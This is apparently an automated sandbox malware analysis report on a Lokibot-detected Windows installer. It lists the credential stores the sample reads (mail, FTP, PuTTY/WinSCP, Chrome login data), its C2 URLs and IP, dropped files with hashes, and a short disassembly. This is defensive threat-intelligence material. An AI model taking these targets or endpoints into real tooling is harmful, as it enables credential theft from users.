                Source: Yara matchFile source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: __.exe PID: 7040, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)Show sources
                Source: C:\Users\user\Desktop\__.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\__.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\__.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\Desktop\__.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\__.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\Desktop\__.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\Desktop\__.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\Desktop\__.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\__.exeCode function: PopPassword
                Source: C:\Users\user\Desktop\__.exeCode function: SmtpPassword
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\__.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000003.00000002.553223743.00000000007A7000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: __.exe PID: 5768, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: __.exe PID: 7040, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerSystem Information Discovery5SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSecurity Software Discovery11Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                __.exe35%VirustotalBrowse
                __.exe40%ReversingLabsWin32.Worm.SpyBot
                __.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\nsjD69.tmp\firfslz.dll14%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\nsjD69.tmp\firfslz.dll8%ReversingLabsWin32.Trojan.Pwsx

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                3.0.__.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.__.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.__.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.1.__.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.__.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.__.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.__.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
                3.0.__.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.2.__.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.2.__.exe.23e0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                slimpackage.com5%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://slimpackage.com/slimmain/five/fre.php3100%Avira URL Cloudmalware
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://slimpackage.com/slimmain/five/fre.php100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                slimpackage.com
                		104.223.93.105
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://slimpackage.com/slimmain/five/fre.phptrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://slimpackage.com/slimmain/five/fre.php3__.exe, 00000003.00000003.422484605.00000000007BC000.00000004.00000001.sdmp, __.exe, 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://nsis.sf.net/NSIS_Error__.exefalse
                  		high
                  http://nsis.sf.net/NSIS_ErrorError__.exefalse
                    		high
                    http://www.ibsensoftware.com/__.exe, __.exe, 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, __.exe, 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    104.223.93.105
                    		slimpackage.comUnited States
                    		8100ASN-QUADRANET-GLOBALUStrue

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:553072
                    Start date:14.01.2022
                    Start time:09:23:18
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 41s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:__.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/6@56/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 88.3% (good quality ratio 85.6%)
                    • Quality average: 80.7%
                    • Quality standard deviation: 26.7%
                    HCA Information:
                    • Successful, ratio: 88%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • HTTP Packets have been reduced
                    • TCP Packets have been reduced to 100
                    • Excluded IPs from analysis (whitelisted): 23.211.6.115
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    09:24:24API Interceptor53x Sleep call for process: __.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\nsjD68.tmp
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):250769
                    Entropy (8bit):7.762180757879711
                    Encrypted:false
                    SSDEEP:3072:C4wPAhYqnzXSf+qIVzB1omvyj4JFR59YLv45oKPwHrcW7F7CtOz:LwohYqnrt91BZvycJFXGvyIcmFX
                    MD5:A7EF0A59978ABC0CB3C0A85906BE0161
                    SHA1:34F37AC927835F0C9F604ADF5F2E9B3FB6B97539
                    SHA-256:F107CF5C0D3A00F20BDF7497BDD2CFF8AF63027833E286763E9E177763871388
                    SHA-512:65B80E53683C8E9A715F068A3CCB1600CDF49CF53451BB3C6421A2DBA162080C86A1A56192B98D0326E41A14A0AF2B08340A9DB1CE50AAD94BC93E24CEFEF81D
                    Malicious:false
                    Reputation:low
                    Preview: 1W......,.......................lA......KV.......W..........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\nsjD69.tmp\firfslz.dll
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):4.173898700356354
                    Encrypted:false
                    SSDEEP:48:SpoRIUTb4g3e7eKgJKXIkuW2yH+ZsQMR7/iItlRuqS99nhR:ZRS2e7etJ0FuoH+ZdcZxwh
                    MD5:57164986833DAF48BE0E0D9C1871A009
                    SHA1:EFCE1DD97671F954A1F342EC3AEA8AC0C90FE020
                    SHA-256:881D216BDA06FBCD5809BA113EE4574FB5D464DBE464E8627B52973C08DBA5A3
                    SHA-512:05D5908207511EE5A8075659F1D63DE21963738398560CC15850603C186B2BE76841D5C594AD673D68C30D2FC0DCE0E7340F29A6EBCE751AC3B1B3FDED713EF6
                    Malicious:true
                    Antivirus:
                    • Antivirus: Virustotal, Detection: 14%, Browse
                    • Antivirus: ReversingLabs, Detection: 8%
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x-2..Ca..Ca..CaZ.Ma..Ca..B`..Ca..Ba..Ca.lG`..Ca.lC`..Ca.l.a..Ca.lA`..CaRich..Ca........PE..L...X..a...........!......................... ...............................P............@.......................... ..L....!.......0.......................@..\.................................................... ...............................text............................... ..`.rdata..l.... ......................@..@.rsrc........0......................@..@.reloc..\....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\nsqvmlbcyr
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):5432
                    Entropy (8bit):6.087044084001559
                    Encrypted:false
                    SSDEEP:96:KALZVbpT0Su7ws144QsAAmXekW6YZtoE0IEJ3tdn0o9i6DEHDvdA:HLZscPs/mOkSZF0IUh7DyJA
                    MD5:3A01C4787585868250B9F281A7845795
                    SHA1:057BD395F2C87952FDE385C6ED75B1E574C77CFC
                    SHA-256:FC90C681214CD63C37F7E60EC7872F2B1A8244BBDC26C8FBBF041C4A9CCF948F
                    SHA-512:0B3A523064B28318EC34389A0C5895DF866AFFC0E8312CAFF5E3F2A50BA5811C0EBC54BD19F88F4C6D80F93E3341989081C1B88335D4467ACFBD35FA8959295C
                    Malicious:false
                    Reputation:low
                    Preview: l..WW....*!..(.W......w......o.(.WN.s.WWW.(.Wv8.v8....'opWWW.....v8.v8....'ooWWW....[v8.v8....'o.WWW.....Cv8.v8....'o9WWW.........K..%O...ZZ....w..k....oK....o.....o..s.K..]%.....oZ.s.KM..s.!.(..k.%.oWWWW.K....(sv8..v8..v8...v8...v8w.v8o...;...........T8.v8.....O....Z(soWWWWN..K.WWW.K....(......."..M.W..$$.........O.W......O.W..........K..s..O.W...O.T.....s..M.W..u..o..WWo).WWM.W..v..o.WWo..WWMOW.b.o.WWo.WWMOW..........oN...WWW....s...W;...s.WW..s...s.......rko..WW..;...O.%O...W........o.%O..tW......%.%O...W....'..v..o.TWW'oIpvv..r...o'v8Oo.vvv....W;Q.(.Wr.N.TWWW....MKW..........oN...WWW.....s...W;...s.WW..s...s.......rko.KWW.....WWW..O.%O...W.........%O..tW..........%O.t..........%O..]Z........o.%O..t.......%.%O...W....'..u..oqWWW'ozsvv.....W;O..o....Tr.v8.v8.v8.v8.v8Oo.yvv....W;Q.(.Wr.N.TWWW....M.W...SN...WWW..k..s...W;...s.WW..s...s.......rko%ZWW..;...O.%O...W..k..o...%O..tW..k..o%.%O...W...k'.b.o.WWW'o.svv..r.v8
                    C:\Users\user\AppData\Local\Temp\x3tnp7bgu2rwywf
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):218392
                    Entropy (8bit):7.989462233980479
                    Encrypted:false
                    SSDEEP:3072:NAhYqnzXSf+qIVzB1omvyj4JFR59YLv45oKPwHrcW7F7CtOzI:ihYqnrt91BZvycJFXGvyIcmFXk
                    MD5:08255E86024B19B780D684228C9A9C12
                    SHA1:A14F115B3CDFECED7D7645C01FFA47B067CDC578
                    SHA-256:1CA3B0CD593A604966C7B67E3E292ECED9E4DC2D67516AA636867A364C75339D
                    SHA-512:E84CCA2F400B513482ED56940091B5CAD38F6000CDF6120F1E798A8788A5EE8C673A7A803474C9ED84EEB2A88A6768E04A5594BA4E49CE8899B0E117230B6A97
                    Malicious:false
                    Reputation:low
                    Preview: _..}..5...Wq...L.....l...b..r>d)n..".......E.4...k7.."o....d...l.....7.......W..in....{..(/..J}.&..>.....`.o.&k.`~eO.R..._6r/....79Jc(#|#J.k~..kDc.v1q. ._..........Qc..*#f......,EL.r.h...O.Q.W5d...u..-.t.`..<..C .J....6...C...l.A._..q.....$.....M.}.....k.WS........l...b.Vr>db..."...#...E....k7...o..w.d......K.`...d..J.TMO+.......K0..q.6...{I{...)/\.p.^.=.O.R....'.NH.^..HV......:.@..AS..`...qc...M....O..s6...;-.l.h]*N...D.fP..m.....'x[...6...^U...{aeX.Mt7@.I..|.l.v.....@..*%.."...M.}}.5.I.W......:.l.(..b.e~>dNn..........E.4...o7...cU..d.2......K.q.....`.JzTM.+.....k....q.6...0I{...)..Hp~;~=.O.R....'.NH....HV......:.@..AS..`...qc...M....O..s6...;-.l.h]*N...D.fP..m......'x[...6...^U...{aeX.Mt7@...C...l..^_...@..........M.}}.5.I.WS........l.E..b..r>d)n..".......E.4...k7.."o..w.d..$.....K.`...d.`.JzTM.+.....k.K0..q.6...{I{...).uHp~^.=.O.R....'.NH.^..HV......:.@..AS..`...qc...M....O..s6...;-.l.h]*N...D.fP..m......'x[...6...^U...{aeX.Mt7@.
                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):1.0424600748477153
                    Encrypted:false
                    SSDEEP:3:/lbON:u
                    MD5:89CA7E02D8B79ED50986F098D5686EC9
                    SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                    SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                    SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ........................................user.

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.921819184073758
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:__.exe
                    File size:238317
                    MD5:e9b74bfb67bf3dcef39e23674d4dd63f
                    SHA1:6fc16b7fe6e2d6567bfd2cf68b407fc7f5097a93
                    SHA256:aeff0c4823c37fc2054f80c6bf7dafcf7fce8abb84d7b72a08fa67411d2aa480
                    SHA512:ae2386500840fbed380f46fafc1e3326f12ce87436be22ace0e536d6d9c83f4d77e27793c2d4fe30e607850b37c2eecb4ab35c8630fff2f8a5534d21349efb27
                    SSDEEP:6144:owyQnce+mjfo4FU/iUB9l1fXfCwcJA0b22:Vce+mjfoQU//Zf9n0C2
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                    File Icon

                    Icon Hash:b2a88c96b2ca6a72

                    Static PE Info

                    General

                    Entrypoint:0x403225
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
                    Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:099c0646ea7282d232219f8807883be0

                    Entrypoint Preview

                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409128h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push 00008001h
                    call dword ptr [004070B4h]
                    push ebx
                    call dword ptr [0040727Ch]
                    push 00000008h
                    mov dword ptr [00423F58h], eax
                    call 00007F16F4D3F910h
                    mov dword ptr [00423EA4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F450h
                    call dword ptr [00407158h]
                    push 004091B0h
                    push 004236A0h
                    call 00007F16F4D3F5C7h
                    call dword ptr [004070B0h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F16F4D3F5B5h
                    push ebx
                    call dword ptr [0040710Ch]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423EA0h], eax
                    mov eax, edi
                    jne 00007F16F4D3CDDCh
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F16F4D3F0A8h
                    push eax
                    call dword ptr [0040721Ch]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F16F4D3CE35h
                    cmp cl, 00000020h
                    jne 00007F16F4D3CDD8h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F16F4D3CDCCh
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [eax+eax+00h], 00000000h

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
